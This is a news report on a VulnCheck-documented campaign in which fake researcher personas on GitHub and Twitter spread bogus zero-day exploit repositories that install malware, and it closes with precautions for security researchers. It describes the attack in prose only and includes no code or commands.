A hacker has launched an unusual attack campaign by creating rogue GitHub repositories that claim to host zero-day exploits for popular applications but instead deliver malware. To make matters even more deceptive, the attacker went to great lengths to create fake GitHub and Twitter accounts, posing as security researchers and using real photos of researchers from well-known cybersecurity firms.
According to a report by security firm VulnCheck, the attacker’s persistence indicates a belief that these attacks will be successful, despite the fact that the delivered malware is quite obvious. While targeting security researchers is not entirely new, such attacks are relatively rare and are typically attributed to advanced persistent threat (APT) groups who seek access to sensitive information. An example of this is a campaign reported by Google’s Threat Analysis Group in 2021, where a government-backed North Korean entity created a web of fake accounts posing as security researchers to promote proof-of-concept exploits.
In the GitHub fake account campaign, the attacker utilized these fake accounts to contact real researchers and invite them to collaborate. As part of the communication, a Visual Studio project with proof-of-concept exploit code was shared, but it also contained a malicious DLL that deployed malware on the victim’s computer. Additionally, some researchers who visited the attacker’s blog had their up-to-date systems exploited, suggesting the presence of zero-day exploits in the attacker’s arsenal.
VulnCheck first discovered one of these rogue repositories in early May and promptly reported it to GitHub, resulting in its removal. This particular repository claimed to host a zero-day exploit for Signal, a popular secure communications app. Despite the takedown, the attacker persisted and created new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium. The fake accounts created for this campaign claimed to belong to researchers working for a non-existent company called High Sierra Cyber Security. The same names and profile information were then used to create Twitter accounts to further promote the repositories.
It’s important to note that although this campaign shares similarities with the Google-identified attack in 2021, it appears to be less sophisticated. The malicious code distributed from the rogue GitHub repositories is a file named poc.py, which downloads either cveslinux.zip or cveswindows.zip depending on the victim’s operating system. These archive files are unpacked, and the contained files are executed. The Windows payload is flagged by 36 antivirus programs as a trojan, while the Linux binary is flagged by 25.
The VulnCheck researchers state that it is unclear whether this campaign is the work of a single individual or a more sophisticated group. Nonetheless, this highlights the fact that security researchers are attractive targets for malicious actors. As a precaution, researchers should exercise caution when downloading code from GitHub, carefully reviewing the code they are executing and avoiding the use of anything they don’t understand.
Experienced security researchers typically take precautions when handling potentially malicious code. They often test proof-of-concept exploits on isolated test systems within virtual machines, which allows for close monitoring and easy system wipeouts. Executing such code on a work machine would likely violate standard security policies, particularly within a cybersecurity company.
In conclusion, this recent attack campaign targeting security researchers through rogue GitHub repositories underscores the need for continuous vigilance in the cybersecurity community. As cyber threats continue to evolve, researchers must remain cautious when engaging with unknown code sources and always prioritize code review and understanding before execution.